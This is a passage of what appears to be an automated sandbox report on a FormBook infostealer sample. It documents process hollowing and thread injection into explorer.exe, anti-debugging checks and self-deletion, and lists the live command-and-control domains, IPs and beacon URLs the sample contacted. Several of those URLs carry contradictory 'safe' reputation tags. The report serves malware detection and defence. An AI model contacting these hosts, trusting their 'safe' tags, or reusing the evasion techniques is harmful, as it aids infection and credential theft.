          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04935210 mov eax, dword ptr fs:[00000030h]7_2_04935210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04935210 mov eax, dword ptr fs:[00000030h]7_2_04935210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493AA16 mov eax, dword ptr fs:[00000030h]7_2_0493AA16
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493AA16 mov eax, dword ptr fs:[00000030h]7_2_0493AA16
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04953A1C mov eax, dword ptr fs:[00000030h]7_2_04953A1C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FAA16 mov eax, dword ptr fs:[00000030h]7_2_049FAA16
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FAA16 mov eax, dword ptr fs:[00000030h]7_2_049FAA16
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04948A0A mov eax, dword ptr fs:[00000030h]7_2_04948A0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04974A2C mov eax, dword ptr fs:[00000030h]7_2_04974A2C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04974A2C mov eax, dword ptr fs:[00000030h]7_2_04974A2C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A08A62 mov eax, dword ptr fs:[00000030h]7_2_04A08A62
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FEA55 mov eax, dword ptr fs:[00000030h]7_2_049FEA55
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.th0rgramm.com
          Source: C:\Windows\explorer.exeDomain query: www.mywinnersworld.com
          Source: C:\Windows\explorer.exeDomain query: www.hatikuturkila.com
          Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 91.236.136.12 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.rainbowsdepot.com
          Source: C:\Windows\explorer.exeDomain query: www.tonton-koubou.com
          Source: C:\Windows\explorer.exeNetwork Connect: 163.44.185.226 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.gracieleesgiftsandmore.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.97.19.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ezmodafinil.com
          Source: C:\Windows\SysWOW64\explorer.exeDomain query: www.formula-kuhni.com
          Source: C:\Windows\explorer.exeDomain query: www.phillhutt.com
          Source: C:\Windows\explorer.exeDomain query: www.orgoneartist.com
          Source: C:\Windows\explorer.exeNetwork Connect: 67.205.188.68 80Jump to behavior
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_740D1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_740D1000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeSection loaded: unknown target: C:\Users\user\Desktop\AQJEKNHnWK.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 8C0000Jump to behavior
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess created: C:\Users\user\Desktop\AQJEKNHnWK.exe 'C:\Users\user\Desktop\AQJEKNHnWK.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.217135660.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000004.00000002.469303523.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.472566811.00000000031C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp, explorer.exe, 00000004.00000002.469303523.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.472566811.00000000031C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.469303523.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.472566811.00000000031C0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000004.00000002.469303523.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.472566811.00000000031C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery241Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383851 Sample: AQJEKNHnWK.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 32 www.thelitigatorsbookclub.com 2->32 34 www.jjwheelerphotography.com 2->34 36 4 other IPs or domains 2->36 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 4 other signatures 2->52 11 AQJEKNHnWK.exe 18 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\...\bdww7k1w8bk0.dll, PE32 11->30 dropped 64 Detected unpacking (changes PE section rights) 11->64 66 Maps a DLL or memory area into another process 11->66 68 Tries to detect virtualization through RDTSC time measurements 11->68 70 Contains functionality to prevent local Windows debugging 11->70 15 AQJEKNHnWK.exe 11->15         started        signatures6 process7 signatures8 72 Modifies the context of a thread in another process (thread injection) 15->72 74 Maps a DLL or memory area into another process 15->74 76 Sample uses process hollowing technique 15->76 78 Queues an APC in another process (thread injection) 15->78 18 explorer.exe 15->18 injected process9 dnsIp10 38 www.formula-kuhni.com 91.236.136.12, 80 WEBHOST1-ASRU Russian Federation 18->38 40 www.tonton-koubou.com 163.44.185.226, 49727, 80 INTERQGMOInternetIncJP Japan 18->40 42 9 other IPs or domains 18->42 54 System process connects to network (likely due to code injection or exploit) 18->54 22 explorer.exe 12 18->22         started        signatures11 process12 dnsIp13 44 www.formula-kuhni.com 22->44 56 System process connects to network (likely due to code injection or exploit) 22->56 58 Modifies the context of a thread in another process (thread injection) 22->58 60 Maps a DLL or memory area into another process 22->60 62 Tries to detect virtualization through RDTSC time measurements 22->62 26 cmd.exe 1 22->26         started        signatures14 process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          AQJEKNHnWK.exe19%VirustotalBrowse
          AQJEKNHnWK.exe35%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll21%ReversingLabsWin32.Trojan.Wacatac

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.explorer.exe.2d564d0.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.2.explorer.exe.4e47960.6.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.AQJEKNHnWK.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.AQJEKNHnWK.exe.740d0000.5.unpack100%AviraHEUR/AGEN.1131513Download File
          7.2.explorer.exe.8c0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.2.AQJEKNHnWK.exe.26c0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.1.AQJEKNHnWK.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.AQJEKNHnWK.exe.1eef0000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.gracieleesgiftsandmore.com/hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.mywinnersworld.com/hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD0%Avira URL Cloudsafe
          http://www.tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD0%Avira URL Cloudsafe
          http://www.formula-kuhni.com/eIm#0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://julianlawoffices.law/hx3a/?tZUT=Iu/IXyUbTVDu5P2JH19Ubbm/NNayCdBr7HPQNpzBLmA0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.th0rgramm.com/hx3a/0%Avira URL Cloudsafe
          http://www.phillhutt.com/hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBD0%Avira URL Cloudsafe
          http://tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.formula-kuhni.com/hx3a/?tZUT=caEAE6TOQuxSMBR5BS8nf0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.tonton-koubou.com
          		163.44.185.226
          		truetrue
            		unknown
            www.mywinnersworld.com
            		67.205.188.68
            		truetrue
              		unknown
              jjwheelerphotography.com
              		192.0.78.24
              		truetrue
                		unknown
                www.formula-kuhni.com
                		91.236.136.12
                		truetrue
                  		unknown
                  www.phillhutt.com
                  		103.97.19.74
                  		truetrue
                    		unknown
                    shops.myshopify.com
                    		23.227.38.74
                    		truetrue
                      		unknown
                      apettelp.club
                      		95.215.210.10
                      		truetrue
                        		unknown
                        thelitigatorsbookclub.com
                        		184.168.131.241
                        		truetrue
                          		unknown
                          www.th0rgramm.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.hatikuturkila.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.jjwheelerphotography.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.thelitigatorsbookclub.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.rainbowsdepot.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.gracieleesgiftsandmore.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.apettelp.club
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.ezmodafinil.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.orgoneartist.com
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.gracieleesgiftsandmore.com/hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBDtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mywinnersworld.com/hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBDtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBDtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            www.th0rgramm.com/hx3a/true
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.phillhutt.com/hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBDtrue
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.comexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.formula-kuhni.com/eIm#explorer.exe, 00000007.00000002.472073266.0000000002DBC000.00000004.00000020.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tiro.comexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.goodfont.co.krexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://julianlawoffices.law/hx3a/?tZUT=Iu/IXyUbTVDu5P2JH19Ubbm/NNayCdBr7HPQNpzBLmAexplorer.exe, 00000007.00000002.474718381.0000000004FC2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.carterandcone.comlexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.typography.netDexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://fontfabrik.comexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fFexplorer.exe, 00000007.00000002.474718381.0000000004FC2000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.formula-kuhni.com/hx3a/?tZUT=caEAE6TOQuxSMBR5BS8nfexplorer.exe, 00000007.00000002.472169147.0000000002DCF000.00000004.00000020.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fonts.comexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.sandoll.co.krexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.sakkal.comexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                163.44.185.226
                                                                		www.tonton-koubou.comJapan7506INTERQGMOInternetIncJPtrue
                                                                103.97.19.74
                                                                		www.phillhutt.comChina
                                                                		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                91.236.136.12
                                                                		www.formula-kuhni.comRussian Federation
                                                                		44094WEBHOST1-ASRUtrue
                                                                23.227.38.74
                                                                		shops.myshopify.comCanada
                                                                		13335CLOUDFLARENETUStrue
                                                                67.205.188.68
                                                                		www.mywinnersworld.comUnited States
                                                                		14061DIGITALOCEAN-ASNUStrue

                                                                General Information

                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                Analysis ID:383851
                                                                Start date:08.04.2021
                                                                Start time:11:05:12
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 10m 1s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Sample file name:AQJEKNHnWK.exe
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:30
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@7/3@14/5
                                                                EGA Information:Failed
